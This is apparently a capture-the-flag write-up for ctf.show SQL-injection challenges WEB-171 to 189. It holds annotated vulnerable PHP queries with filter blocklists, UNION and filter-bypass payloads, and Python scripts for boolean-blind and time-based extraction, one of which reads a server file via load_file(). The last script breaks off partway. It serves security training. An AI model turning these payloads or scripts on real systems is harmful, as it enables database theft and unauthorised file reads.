WEB-171

//Builds the lookup query by string concatenation: $_GET['id'] is dropped unescaped inside the single-quoted id literal,
//so a quote in `id` closes that literal and everything after it is parsed as SQL. This is the injection point every payload in this writeup uses.
$sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;";

payload (note: the snippet above selects only `username,password`, yet the UNIONs below carry three columns — the real query evidently returns id, username and password; always confirm the column count first, e.g. `1' order by 3 --+`, because a mismatch fails with "different number of columns". The `--+` also comments out the trailing `' limit 1;`):

1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='ctfshow_user' --+
1' union select id,username,password from ctfshow_user --+

WEB-172

//Same unescaped concatenation of $_GET['id'] as WEB-171; the table is ctfshow_user2 and the query returns exactly two columns, so UNION payloads must carry two.
$sql = "select username,password from ctfshow_user2 where username !='flag' and id = '".$_GET['id']."' limit 1;";
//Post-query check: the response is marked successful only when the returned username is not the literal 'flag'.
//The comparison is strict (!==) against the raw column value, so an encoded form such as hex(username) (used by the payload below) is no longer equal to 'flag' and passes.
    if($row->username!=='flag'){
      $ret['msg']='查询成功';
    }

payload (two UNION columns to match the query; the username is wrapped in hex() so the `!=='flag'` check passes — hex-decode the returned username to read the flag row):

1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() --+
1' union select 1,group_concat(column_name) from information_schema.columns where table_name='ctfshow_user2' --+
1' union select hex(username),password from ctfshow_user2 --+

WEB-173

//Three-column variant (id,username,password) of the same concatenated, unescaped query.
$sql = "select id,username,password from ctfshow_user3 where username !='flag' and id = '".$_GET['id']."' limit 1;";
//Post-query check: success only if the case-insensitive regex /flag/ matches nowhere in the JSON-encoded result.
//The whole result is inspected, so every selected column has to be encoded (hex() in the payload below) to keep the substring 'flag' out of the JSON.
    if(!preg_match('/flag/i', json_encode($ret))){
      $ret['msg']='查询成功';
    }

payload (every selected column is wrapped in hex() so the string `flag` never appears in the JSON the filter inspects; hex-decode the output):

1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='ctfshow_user3' --+
1' union select hex(id),hex(username),hex(password) from ctfshow_user3 --+

WEB-174

//Two-column query on ctfshow_user4; injection point unchanged.
$sql = "select username,password from ctfshow_user4 where username !='flag' and id = '".$_GET['id']."' limit 1;";
//Post-query check: the JSON result may contain neither 'flag' (case-insensitive) nor any digit.
//hex() output is mostly digits, so the encoding trick of WEB-173 is gone; the payload below falls back to boolean-based blind extraction, one character per request.
    if(!preg_match('/flag|[0-9]/i', json_encode($ret))){
      $ret['msg']='查询成功';
    }

payload (boolean-based blind: the id stays `1`, so a true condition returns the admin row — `'admin' in res.text` is the oracle — and a false one returns nothing; one character of the secret is confirmed per request):

import requests

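# WEB-174 - boolean-based blind extraction.
# The server refuses to echo any result containing a digit or the word 'flag',
# so nothing can be read back directly. Each request instead asks "is character
# `pos` of the secret equal to `ch`?": when true the query still returns the
# id=1 row (username admin), when false it returns nothing, and the presence of
# 'admin' in the response body is the oracle.
url  = "http://43fcdabd-c874-4eff-aba9-7f5a39e7d3d0.challenge.ctf.show/api/v4.php?id="
flag = ""
dirt = "0123456789abcdefghijklmnopqrstuvwxyz{}-,."
# Other targets used during the same run (schema enumeration), kept for reference:
#   group_concat(table_name) from information_schema.tables where table_schema=database()
#   group_concat(column_name) from information_schema.columns where table_name="ctfshow_user4"
TARGET = 'password from ctfshow_user4 where username="flag"'
MAX_LEN = 45       # positions probed; the original stopped here as well
TIMEOUT = 10       # seconds; the original passed no timeout, so one stalled connection hung the whole run


def build_payload(pos, ch, target=TARGET):
    """Full request URL testing whether character `pos` (1-based) of `select <target>` equals `ch`.

    `--+` closes the statement: the '+' decodes to a space, which MySQL requires after `--`."""
    return url + '''1' and substr((select {}),{},1)="{}"--+'''.format(target, pos, ch)


def extract(charset=dirt, max_len=MAX_LEN):
    """Recover the target one character at a time and return it.

    Stops at the first position where no candidate matches: that is either the
    end of the string or a character outside `charset`. The original kept
    looping in that case and silently produced a truncated flag."""
    found = ""
    # One Session reuses the TCP connection across the ~1800 probes instead of opening a new one per request.
    with requests.Session() as sess:
        for pos in range(1, max_len + 1):
            for ch in charset:
                res = sess.get(build_payload(pos, ch), timeout=TIMEOUT)
                if 'admin' in res.text:
                    found += ch
                    print(found)
                    break
            else:
                print("no candidate matched at position {} - stopping (extend `dirt` if the flag looks incomplete)".format(pos))
                break
    return found


if __name__ == "__main__":
    flag = extract()
    print(flag)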

WEB-175

//Two-column query on ctfshow_user5; injection point unchanged.
$sql = "select username,password from ctfshow_user5 where username !='flag' and id = '".$_GET['id']."' limit 1;";
//Post-query check: success only if the JSON result contains no ASCII byte at all (0x00-0x7f).
//json_encode() output always contains ASCII punctuation (braces, quotes), so this branch is effectively unreachable and the response carries no data.
//With no output channel left, the payload below switches to a time-based oracle (sleep()).
    if(!preg_match('/[\x00-\x7f]/i', json_encode($ret))){
      $ret['msg']='查询成功';
    }

payload (time-based blind: a correct guess triggers sleep(3) and the script treats a round-trip of at least 2.5 s as "true"; tune the threshold to the link's latency, keep the HTTP timeout longer than the sleep, and re-check a hit on a noisy connection because a single slow response looks identical to one):

import requests
import time

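# WEB-175 - time-based blind extraction.
# The server suppresses every response containing ASCII, so nothing can be read
# back; the only side channel left is latency: a correct guess makes the DB run
# sleep(SLEEP) before answering.
url  = "http://ec5964c7-abfc-4994-b944-4cdc22fe9cfa.challenge.ctf.show/api/v5.php?id="
flag = ""
dirt = "0123456789abcdefghijklmnopqrstuvwxyz{}-,."
# Other targets used during the same run (schema enumeration), kept for reference:
#   group_concat(table_name) from information_schema.tables where table_schema=database()
#   group_concat(column_name) from information_schema.columns where table_name="ctfshow_user5"
TARGET = 'password from ctfshow_user5 where username="flag"'
SLEEP = 3              # seconds the DB sleeps on a hit
THRESHOLD = 2.5        # seconds of round-trip above which a response counts as a hit
TIMEOUT = SLEEP + 10   # must exceed SLEEP, otherwise every hit is reported as a timeout
MAX_LEN = 45


def build_payload(pos, ch, target=TARGET, delay=SLEEP):
    """Request URL that sleeps `delay` seconds iff character `pos` (1-based) of `select <target>` equals `ch`."""
    return url + '''1' and if(substr((select {}),{},1)="{}",sleep({}),0)--+'''.format(target, pos, ch, delay)


def timed_get(sess, target_url):
    """GET `target_url` and return the elapsed seconds, measured on a monotonic clock (time.time() can jump)."""
    start = time.perf_counter()
    sess.get(target_url, timeout=TIMEOUT)
    return time.perf_counter() - start


def extract(charset=dirt, max_len=MAX_LEN):
    """Recover the target one character at a time and return it.

    A position where no candidate slows the server down is treated as the end of
    the string (or a character outside `charset`) and ends the run; the original
    kept going and silently produced a truncated flag. Note that a transient
    network stall is indistinguishable from a hit - re-run or raise THRESHOLD if
    the output looks wrong."""
    found = ""
    with requests.Session() as sess:
        for pos in range(1, max_len + 1):
            for ch in charset:
                if timed_get(sess, build_payload(pos, ch)) >= THRESHOLD:
                    found += ch
                    print(found)
                    break
            else:
                print("no candidate matched at position {} - stopping".format(pos))
                break
    return found


if __name__ == "__main__":
    flag = extract()
    print(flag)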

WEB-176

//Three-column query; same unescaped concatenation of $_GET['id'].
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;";
//The input now passes through a filter whose body the challenge hides.
  function waf($str){
   //"The code is too simple to show" - body withheld by the challenge; the payload below shows it does not stop a plain `or 1=1` tautology.
  }

payload (`or 1=1` — AND binds tighter than OR, so `username !='flag' and id='1'` is overridden by the OR and the flag row becomes selectable; `--+` comments out the trailing `' limit 1;` that would otherwise cap the result at one row):

1' or 1=1 --+

WEB-177

//Three-column query; same unescaped concatenation of $_GET['id'].
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;";
//Hidden filter again; per the note below it rejects the space character, which the payload sidesteps with %09 (tab) as the whitespace token.
  function waf($str){
   //"The code is too simple to show" - body withheld by the challenge.
  }

过滤了空格 (the filter rejects the space character 0x20; %09 — horizontal tab — is whitespace to the MySQL lexer and replaces every space, and %23 (#) ends the statement because the `--+` form would need a trailing space, which is exactly what is filtered):
payload:

1'%09union%09select%091,2,group_concat(table_name)%09from%09information_schema.tables%09where%09table_schema=database()%09%23
1'%09union%09select%091,2,group_concat(column_name)%09from%09information_schema.columns%09where%09table_name='ctfshow_user'%09%23
1'%09union%09select%09id,username,password%09from%09ctfshow_user%09%23

WEB-178

//Three-column query; same unescaped concatenation of $_GET['id'].
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;";
//Hidden filter; the writeup reuses the WEB-177 payload unchanged, so %09 as whitespace and %23 as the comment still pass here.
  function waf($str){
   //"The code is too simple to show" - body withheld by the challenge.
  }   

payload (identical to WEB-177 — %09 as whitespace and %23 as the comment still pass this filter):

1'%09union%09select%091,2,group_concat(table_name)%09from%09information_schema.tables%09where%09table_schema=database()%09%23
1'%09union%09select%091,2,group_concat(column_name)%09from%09information_schema.columns%09where%09table_name='ctfshow_user'%09%23
1'%09union%09select%09id,username,password%09from%09ctfshow_user%09%23

WEB-179

//Three-column query; same unescaped concatenation of $_GET['id'].
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;";
//Hidden filter; per the note below it now rejects both the space and %09, so the payload moves on to the next whitespace byte MySQL accepts (%0c, form feed).
  function waf($str){
   //"The code is too simple to show" - body withheld by the challenge.
  }

过滤了空格,%09 (space and tab are both rejected; %0c — form feed — is another byte the MySQL lexer treats as whitespace, as are %0a, %0b and %0d, so try each until one passes the filter):
payload:

1'%0cunion%0cselect%0c1,2,group_concat(table_name)%0cfrom%0cinformation_schema.tables%0cwhere%0ctable_schema=database()%0c%23
1'%0cunion%0cselect%0c1,2,group_concat(column_name)%0cfrom%0cinformation_schema.columns%0cwhere%0ctable_name='ctfshow_user'%0c%23
1'%0cunion%0cselect%0cid,username,password%0cfrom%0cctfshow_user%0c%23

WEB-180

//Three-column query; same unescaped concatenation of $_GET['id'].
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;";
//Hidden filter; the payload below uses no whitespace at all (parentheses separate tokens) and no comment (the trailing quote is absorbed by `and'1'='1`), so it survives any whitespace/comment blocklist.
  function waf($str){
   //"The code is too simple to show" - body withheld by the challenge.
  }

payload (whitespace-free: parentheses separate tokens and, instead of a comment, the query's trailing `'` is consumed by closing with `and'1'='1`. First line — selects the row whose username starts with `f` (the flag row); the `username !='flag'` guard is bypassed because AND binds tighter than OR. Second line — the same row by its id once that is known):

api/?id=%27or(mid(username,1,1)=%27f%27)and%271%27=%271
-1'or(id=26)and'1

WEB-181

//Three-column query; same unescaped concatenation of $_GET['id'].
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;";
//Blocklist filter (case-insensitive). Rejected: space, '*', the C0 whitespace bytes \x09 \x0a \x0b \x0c \x0d, NUL, the 0xa0 byte,
//'#' (listed twice, as \x23 and \#), and the words file / into / select.
//Not rejected: parentheses, quotes, the comment-free `and'1'='1` closer and any function other than select - which is all the payload below needs.
  function waf($str){
    return preg_match('/ |\*|\x09|\x0a|\x0b|\x0c|\x00|\x0d|\xa0|\x23|\#|file|into|select/i', $str);
  }

payload (same as WEB-180: `select` is banned, so instead of a UNION the flag row is read from the same table by filtering on its first letter or its id):

api/?id=%27or(mid(username,1,1)=%27f%27)and%271%27=%271
-1'or(id=26)and'1

WEB-182

//Three-column query; same unescaped concatenation of $_GET['id'].
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;";
//WEB-181's blocklist plus the word 'flag' itself. The payload never spells it out: the row is located by mid(username,1,1)='f' or by its id, so the list is moot.
  function waf($str){
    return preg_match('/ |\*|\x09|\x0a|\x0b|\x0c|\x00|\x0d|\xa0|\x23|\#|file|into|select|flag/i', $str);
  }

payload (unchanged — the word `flag` is now banned, but neither line ever spells it out: the row is located by its first letter or by its id):

api/?id=%27or(mid(username,1,1)=%27f%27)and%271%27=%271
-1'or(id=26)and'1

WEB-183

//The user-controlled value is now a table reference: $_POST['tableName'] is concatenated verbatim after FROM,
//so anything syntactically valid after FROM (a parenthesised table, WHERE, JOIN ...) can be appended.
  $sql = "select count(pass) from ".$_POST['tableName'].";";
//Blocklist filter (case-insensitive): whitespace bytes, '*', '#', NUL, 0xa0, '=', '|' (\x7c) and the words file / or / select / and / flag / into.
//'or' is matched as a substring, so identifiers containing it - information_schema, password - are rejected too; presumably why the schema uses `pass`.
//Still allowed: parentheses, quotes, where, like, left(), which is enough for the boolean probe `(table)where(left(pass,n))like'prefix'`.
  function waf($str){
    return preg_match('/ |\*|\x09|\x0a|\x0b|\x0c|\x0d|\xa0|\x00|\#|\x23|file|\=|or|\x7c|select|and|flag|into/i', $str);
  }
//The page echoes the count; the payload below keys on the literal text "$user_count = 1;" in the response.
      $user_count = 0;

payload (boolean oracle: `left(pass,n) like 'known+guess'` narrows the WHERE to the flag row only when the guess is right, and the echoed count then reads `$user_count = 1;`. LIKE is case-insensitive under the default collation and treats `_`/`%` as wildcards — neither is in the alphabet used here):

import requests
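# WEB-183 - boolean-based blind extraction through a table-name injection.
# tableName is concatenated straight after FROM, so the probe turns
#     select count(pass) from ctfshow_user;
# into
#     select count(pass) from (ctfshow_user)where(left(pass,9))like'ctfshow{x';
# which counts 1 only when the guessed prefix is right. Spaces, `=`, `or` and
# `and` are banned: parentheses separate tokens and LIKE stands in for `=`.
# (`or` is banned as a substring, so a guess that happens to contain "or" is
# rejected by the filter and simply never matches.)
url  = "http://601333f9-6b46-44b1-9696-99b072b8d352.challenge.ctf.show/select-waf.php"
data = {'tableName':''}
flag = "ctfshow{"
dirt = "0123456789abcdefghijklmnopqrstuvwxyz{}-,."
HIT = '$user_count = 1;'   # the page echoes the count as PHP-looking text
MAX_LEN = 45
TIMEOUT = 10


def build_payload(known, ch):
    """tableName value asserting that pass starts with known+ch.

    The LIKE length is derived from the guess, so it is always len(known)+1. The
    original iterated i from 8 while the prefix was already 8 characters long,
    wasting a whole round on a pattern one character longer than left(pass,8).
    LIKE is case-insensitive under the default collation and treats `_`/`%` as
    wildcards - neither is in `dirt`."""
    guess = known + ch
    return "(ctfshow_user)where(left(pass,{}))like'{}'".format(len(guess), guess)


def extract(known=flag, charset=dirt, max_len=MAX_LEN):
    """Extend `known` one character per round and return the result.

    When pass is exhausted, left(pass,n) is shorter than the n-character pattern
    and nothing matches, so the for/else ends the run instead of spinning."""
    with requests.Session() as sess:   # the original created a session but never used it
        while len(known) < max_len:
            for ch in charset:
                data['tableName'] = build_payload(known, ch)
                res = sess.post(url, data=data, timeout=TIMEOUT)
                if HIT in res.text:
                    known += ch
                    print(known)
                    break
            else:
                print("no candidate matched after {!r} - stopping".format(known))
                break
    return known


if __name__ == "__main__":
    flag = extract()
    print(flag)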

WEB-184

//Table-reference injection again, now with count(*).
  $sql = "select count(*) from ".$_POST['tableName'].";";
//Blocklist grows: both quote characters, backtick, '&' (\x26), where, union, sleep and benchmark are added - so no string literals and no WHERE.
//Two details worth noting: the space character itself is no longer in the list, and `\0x0d` is not the same as WEB-183's `\x0d` -
//PCRE reads `\0` as an octal escape for NUL followed by the literal text "x0d", so carriage return (0x0d) is not actually filtered here.
//Still allowed: join ... on, substr(), regexp, char() - the payload builds its comparison string with char() because quotes are gone.
  function waf($str){
    return preg_match('/\*|\x09|\x0a|\x0b|\x0c|\0x0d|\xa0|\x00|\#|\x23|file|\=|or|\x7c|select|and|flag|into|where|\x26|\'|\"|union|\`|sleep|benchmark/i', $str);
  }
//The echoed count is the oracle. The payload uses a self RIGHT JOIN whose ON condition is true for exactly one row when the guess is right,
//so the count becomes 2N-1 instead of N; the script's expected "$user_count = 43;" implies N = 22 rows in ctfshow_user.
      $user_count = 0;

payload (no quotes, no WHERE: `ctfshow_user as x right join ctfshow_user as y on (substr(y.pass,i,1) regexp char(k))` — each y row that satisfies the ON condition expands to all x rows, so the echoed count jumps to 43 exactly when the guess is right; char(k) replaces the forbidden quoted literal. Beware that REGEXP treats `.` as a wildcard, so `.` in the alphabet matches anything):

import requests
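# WEB-184 - boolean-based blind extraction with quotes and WHERE banned.
# The probe is a self RIGHT JOIN whose ON clause holds only for the row whose
# i-th password character matches:
#     select count(*) from ctfshow_user as x right join ctfshow_user as y on (substr(y.pass,i,1)regexp(char(k)));
# Every y row satisfying the condition expands to all x rows, so the count
# becomes 2N-1 (43 here) instead of N exactly when the guess is right. char(k)
# replaces the forbidden quoted literal.
url  = "http://2f26a0e7-8a44-47b8-bbe7-6d1aa82aa558.challenge.ctf.show/select-waf.php"
data = {'tableName':''}
flag = "ctfshow{"
dirt = "0123456789abcdefghijklmnopqrstuvwxyz{}-,."
HIT = '$user_count = 43;'   # 2N-1 with N = 22 rows; adjust if the table size differs
MAX_LEN = 45
TIMEOUT = 10


def regexp_char(ch):
    """char() expression for a one-character regex that matches `ch` literally.

    REGEXP treats `.`, `{`, `}` ... as metacharacters: the original sent char(46)
    for '.', i.e. the pattern `.`, which matches ANY character and appended a
    bogus '.' whenever the real character was not in `dirt`. Non-alphanumerics
    are therefore backslash-escaped as char(92,k); alphanumerics must not be,
    because `\\d`, `\\a` and friends are themselves classes/escapes."""
    k = ord(ch)
    if ch.isalnum():
        return "char({})".format(k)
    return "char(92,{})".format(k)   # 92 = backslash


def build_payload(pos, ch):
    """tableName value whose echoed count is HIT iff character `pos` (1-based) of the flag row's pass is `ch`."""
    return ("ctfshow_user as x right join ctfshow_user as y "
            "on (substr(y.pass,{},1)regexp({}))").format(pos, regexp_char(ch))


def extract(known=flag, charset=dirt, max_len=MAX_LEN):
    """Extend `known` one character per position and return the result.

    A position where nothing matches is the end of the string (substr() past
    the end is '' and matches no single-character regex) or a character outside
    `charset`; the original kept looping and could return a truncated flag."""
    with requests.Session() as sess:   # the original created a session but never used it
        for pos in range(len(known) + 1, max_len + 1):
            for ch in charset:
                data['tableName'] = build_payload(pos, ch)
                res = sess.post(url, data=data, timeout=TIMEOUT)
                if HIT in res.text:
                    known += ch
                    print(known)
                    break
            else:
                print("no candidate matched at position {} - stopping".format(pos))
                break
    return known


if __name__ == "__main__":
    flag = extract()
    print(flag)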

WEB-185

//Table-reference injection with count(*).
  $sql = "select count(*) from ".$_POST['tableName'].";";
//WEB-184's blocklist plus [0-9]: no digit may appear anywhere in the input, so positions, lengths and char() codes
//have to be written as arithmetic on `true` (true+true+... evaluates to the integer n in MySQL) - see the payload's true(n) helper.
//As in WEB-184, `\0x0d` is NUL followed by the literal "x0d", not carriage return, and the space character is not listed.
  function waf($str){
    return preg_match('/\*|\x09|\x0a|\x0b|\x0c|\0x0d|\xa0|\x00|\#|\x23|[0-9]|file|\=|or|\x7c|select|and|flag|into|where|\x26|\'|\"|union|\`|sleep|benchmark/i', $str);
  }
//Echoed count is the oracle; the RIGHT JOIN probe turns N rows into 2N-1 (43) exactly when the guess is right.
      $user_count = 0;

payload (as WEB-184, but digit literals are banned, so every number — position, substr length, char() code — is spelled as `true+true+...`, `true` being 1 in MySQL):

import requests
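# WEB-185 - as WEB-184, but digit literals are banned too ([0-9] in the filter).
# Every number is therefore spelled as `true+true+...` (true is 1 in MySQL):
# the position, the substr length and the char() codes.
url  = "http://cf339e07-f61c-429a-95ed-e6c0eb4f34fd.challenge.ctf.show/select-waf.php"
data = {'tableName':''}
flag = "ctfshow{"
dirt = "0123456789abcdefghijklmnopqrstuvwxyz{}-,."
HIT = '$user_count = 43;'   # 2N-1 with N = 22 rows; adjust if the table size differs
MAX_LEN = 45
TIMEOUT = 10


def true(n):
    """Digit-free MySQL expression equal to the integer n (n >= 1): 'true+true+...'.

    Kept compatible with the original, which also returned 'true' for n < 1."""
    return '+'.join(['true'] * max(n, 1))


def regexp_char(ch):
    """char() expression for a one-character regex matching `ch` literally, with digit-free codes.

    REGEXP treats `.`, `{`, `}` ... as metacharacters: the original sent the
    pattern `.` for '.', which matches ANY character and appended a bogus '.'
    whenever the real character was not in `dirt`. Non-alphanumerics are
    backslash-escaped (92 = backslash); alphanumerics must not be, because
    `\\d`, `\\a` and friends are themselves classes/escapes."""
    k = ord(ch)
    if ch.isalnum():
        return "char({})".format(true(k))
    return "char({},{})".format(true(92), true(k))


def build_payload(pos, ch):
    """tableName value whose echoed count is HIT iff character `pos` (1-based) of the flag row's pass is `ch`."""
    return ("ctfshow_user as x right join ctfshow_user as y "
            "on (substr(y.pass,{},{})regexp({}))").format(true(pos), true(1), regexp_char(ch))


def extract(known=flag, charset=dirt, max_len=MAX_LEN):
    """Extend `known` one character per position and return the result.

    A position where nothing matches is the end of the string or a character
    outside `charset`; the original kept looping and could return a truncated flag."""
    with requests.Session() as sess:   # the original created a session but never used it
        for pos in range(len(known) + 1, max_len + 1):
            for ch in charset:
                data['tableName'] = build_payload(pos, ch)
                res = sess.post(url, data=data, timeout=TIMEOUT)
                if HIT in res.text:
                    known += ch
                    print(known)
                    break
            else:
                print("no candidate matched at position {} - stopping".format(pos))
                break
    return known


if __name__ == "__main__":
    flag = extract()
    print(flag)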

WEB-186

//Table-reference injection with count(*).
  $sql = "select count(*) from ".$_POST['tableName'].";";
//WEB-185's blocklist plus '%', '<', '>' and '^'. None of those are used by the true(n)/char()/regexp probe, so the WEB-185 payload works unchanged.
//As before, `\0x0d` is NUL followed by the literal "x0d" rather than carriage return, and the space character is not listed.
  function waf($str){
    return preg_match('/\*|\x09|\x0a|\x0b|\x0c|\0x0d|\xa0|\%|\<|\>|\^|\x00|\#|\x23|[0-9]|file|\=|or|\x7c|select|and|flag|into|where|\x26|\'|\"|union|\`|sleep|benchmark/i', $str);
  }
//Echoed count is the oracle; the RIGHT JOIN probe turns N rows into 2N-1 (43) exactly when the guess is right.
      $user_count = 0;      

payload (identical to WEB-185 — the newly banned `%`, `<`, `>` and `^` never appear in the probe):

import requests
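# WEB-186 - same filter as WEB-185 plus '%', '<', '>' and '^', none of which the
# probe needs, so the digit-free RIGHT JOIN / regexp / char() technique is reused.
url  = "http://aa84b762-1ddb-4b0a-926c-6c2aa357ee60.challenge.ctf.show/select-waf.php"
data = {'tableName':''}
flag = "ctfshow{"
dirt = "0123456789abcdefghijklmnopqrstuvwxyz{}-,."
HIT = '$user_count = 43;'   # 2N-1 with N = 22 rows; adjust if the table size differs
MAX_LEN = 45
TIMEOUT = 10


def true(n):
    """Digit-free MySQL expression equal to the integer n (n >= 1): 'true+true+...'.

    Kept compatible with the original, which also returned 'true' for n < 1."""
    return '+'.join(['true'] * max(n, 1))


def regexp_char(ch):
    """char() expression for a one-character regex matching `ch` literally, with digit-free codes.

    REGEXP treats `.`, `{`, `}` ... as metacharacters: the original sent the
    pattern `.` for '.', which matches ANY character and appended a bogus '.'
    whenever the real character was not in `dirt`. Non-alphanumerics are
    backslash-escaped (92 = backslash); alphanumerics must not be, because
    `\\d`, `\\a` and friends are themselves classes/escapes."""
    k = ord(ch)
    if ch.isalnum():
        return "char({})".format(true(k))
    return "char({},{})".format(true(92), true(k))


def build_payload(pos, ch):
    """tableName value whose echoed count is HIT iff character `pos` (1-based) of the flag row's pass is `ch`."""
    return ("ctfshow_user as x right join ctfshow_user as y "
            "on (substr(y.pass,{},{})regexp({}))").format(true(pos), true(1), regexp_char(ch))


def extract(known=flag, charset=dirt, max_len=MAX_LEN):
    """Extend `known` one character per position and return the result.

    A position where nothing matches is the end of the string or a character
    outside `charset`; the original kept looping and could return a truncated flag."""
    with requests.Session() as sess:   # the original created a session but never used it
        for pos in range(len(known) + 1, max_len + 1):
            for ch in charset:
                data['tableName'] = build_payload(pos, ch)
                res = sess.post(url, data=data, timeout=TIMEOUT)
                if HIT in res.text:
                    known += ch
                    print(known)
                    break
            else:
                print("no candidate matched at position {} - stopping".format(pos))
                break
    return known


if __name__ == "__main__":
    flag = extract()
    print(flag)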

WEB-187

//Login query: both POST fields are interpolated into the SQL string (this excerpt shows the query before the assignments that feed it; in the real file they must come first).
  $sql = "select count(*) from ctfshow_user where username = '$username' and password= '$password'";

    $username = $_POST['username'];
//md5(..., true) returns the RAW 16-byte digest, not hex. Those bytes land unescaped inside the password literal.
//The classic input ffifdyop has a raw digest beginning with the bytes 'or'6 , so the clause becomes
//  password= ''or'6...'  -> the string '6...' converts to a non-zero number, i.e. true -> count(*) is non-zero without knowing any password.
    $password = md5($_POST['password'],true);

    //Only admin gets the flag; the comparison is a loose != but the value still has to be exactly 'admin'.
    if($username!='admin'){
        $ret['msg']='用户名不存在';
        die(json_encode($ret));
    }

payload:

用户:admin 密码:ffifdyop (username admin, password ffifdyop — md5('ffifdyop', true) begins with the bytes `'or'6`, which, spliced raw into the SQL string, turns the password clause into `''or'6...'`, a tautology; any input whose raw MD5 starts with `'or'` followed by a non-zero digit works the same way)

WEB-188

//The username is interpolated WITHOUT quotes, so a numeric username is compared numerically:
//MySQL casts a non-numeric varchar to 0, making `username = 0` true for every row whose name is not a number.
$sql = "select pass from ctfshow_user where username = {$username}";
  //Username blocklist: and/or/select/from/where/union/join/sleep/benchmark, comma, parentheses and both quote characters. A bare `0` trips none of it.
  if(preg_match('/and|or|select|from|where|union|join|sleep|benchmark|,|\(|\)|\'|\"/i', $username)){
    $ret['msg']='用户名非法';
    die(json_encode($ret));
  }

  //Password must satisfy is_numeric(); '0' does.
  if(!is_numeric($password)){
    $ret['msg']='密码只能为数字';
    die(json_encode($ret));
  }

  //Loose comparison (==) between the stored pass and intval($password). intval('0') is 0, and under PHP 7 any non-numeric
  //string == 0 is TRUE, so whatever pass the first matched row carries satisfies this. PHP 8 changed that rule ('abc' == 0 is
  //false there), so the 0/0 trick depends on the PHP version the target runs.
  if($row['pass']==intval($password)){
      $ret['msg']='登陆成功';
      array_push($ret['data'], array('flag'=>$flag));
    }

payload:

用户:0 密码:0 (username 0, password 0 — the unquoted `username = 0` matches every non-numeric username because MySQL casts the column to 0, and PHP 7's loose `==` makes the returned non-numeric pass equal to intval('0'); on PHP 8 the second step no longer holds)

WEB-189

  //Still unquoted username interpolation, so numeric usernames are compared numerically (see WEB-188).
  $sql = "select pass from ctfshow_user where username = {$username}";
  //Username blocklist now also bans the space, '*', the whitespace bytes, NUL, '&' (\x26), '|' (\x7c), into and from -
  //but NOT parentheses, commas, if(), ascii(), substr(), locate() or load_file(). `if(COND,0,1)` therefore yields
  //username = 0 (matches every non-numeric row) when COND holds and username = 1 (presumably no such row) otherwise.
  if(preg_match('/select|and| |\*|\x09|\x0a|\x0b|\x0c|\x0d|\xa0|\x00|\x26|\x7c|or|into|from|where|join|sleep|benchmark/i', $username)){
    $ret['msg']='用户名非法';
    die(json_encode($ret));
  }

  //Password must be numeric; the payload sends 123 as a deliberately wrong password.
  if(!is_numeric($password)){
    $ret['msg']='密码只能为数字';
    die(json_encode($ret));
  }

  //The oracle is not this success branch but the failure messages: a row found with a wrong password yields "密码错误",
  //no row yields a different message, and the payload distinguishes the two.
  if($row['pass']==$password){
      $ret['msg']='登陆成功';
    }

payload (reads the API's own source with load_file(): first a binary search for the byte offset of `ctfshow` in /var/www/html/api/index.php, then one character at a time from there, using the "wrong password" vs "no such user" messages as the boolean; load_file() needs the FILE privilege and a secure_file_priv that allows the path):

import requests

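# WEB-189 - boolean-based blind read of the API's own source via load_file().
# The username is interpolated unquoted and and/or/select/from/where/space are
# banned, but if(), locate(), ascii(), substr() and load_file() are not.
# `if(COND,0,1)` therefore yields
#     username = 0 -> matches every non-numeric username (MySQL casts the column to 0)
#                     -> row found, password 123 is wrong -> "密码错误"
#     username = 1 -> matches nothing -> a different message
# and the message is the oracle. load_file() needs the FILE privilege and a
# secure_file_priv that permits the path (evidently the case on this target).
url = 'http://e32b038a-f47c-4fd9-bede-e7ebae1e0506.challenge.ctf.show/api/'
data = {'username':'','password':123}
SOURCE_FILE = '/var/www/html/api/index.php'
MARKER = 'ctfshow'
MAX_OFFSET = 300       # search bound for the flag's offset in the file; if getIndex() returns this value, raise it
FLAG_LEN = 45
CHARSET = r'1234567890{-}qazwsxedcrfvtgbyhnujmiklop'
WRONG_PASSWORD = "密码错误"
TIMEOUT = 10


def build_index_probe(offset, marker=MARKER, path=SOURCE_FILE):
    """Username that is 'true' iff `marker` starts after byte `offset` (locate() is 1-based)."""
    return "if(locate('{}',load_file('{}'))>{},0,1)".format(marker, path, offset)


def build_char_probe(pos, ch, path=SOURCE_FILE):
    """Username that is 'true' iff byte `pos` of `path` DIFFERS from `ch` (inverted sense, kept from the original)."""
    return 'if(ascii(substr(load_file("{}"),{},1))!={},0,1)'.format(path, pos, ord(ch))


def _http_oracle():
    """Oracle against the live target: True when the server answers 'wrong password', i.e. the if() produced 0."""
    sess = requests.Session()   # connection reuse across the few hundred probes

    def oracle(username):
        data['username'] = username
        res = sess.post(url, data=data, timeout=TIMEOUT)
        return WRONG_PASSWORD in res.json()['msg']
    return oracle


def getIndex(oracle=None):
    """Binary-search the 1-based offset of MARKER in SOURCE_FILE.

    Invariant: the offset lies in [start, tail]; the loop ends with start == tail == offset,
    so `start` is returned. The original returned `mid`, which equals offset-1 whenever the
    final step moved `start`, so getFlag()'s old `num+1` start landed on the 'c' or on the
    't' of ctfshow depending on the path taken.

    `oracle` is a callable(username) -> bool; it defaults to the live HTTP oracle and can be
    replaced by a fake for offline testing."""
    oracle = oracle or _http_oracle()
    start, tail = 1, MAX_OFFSET
    while start < tail:
        mid = (start + tail) // 2
        if oracle(build_index_probe(mid)):   # offset > mid
            start = mid + 1
        else:
            tail = mid
    return start


def getFlag(num, oracle=None):
    """Read up to FLAG_LEN bytes starting AT offset `num` (the 'c' of ctfshow) and return them.

    Stops at the first byte outside CHARSET, i.e. the source text after the closing brace;
    the original always read exactly 45 positions."""
    oracle = oracle or _http_oracle()
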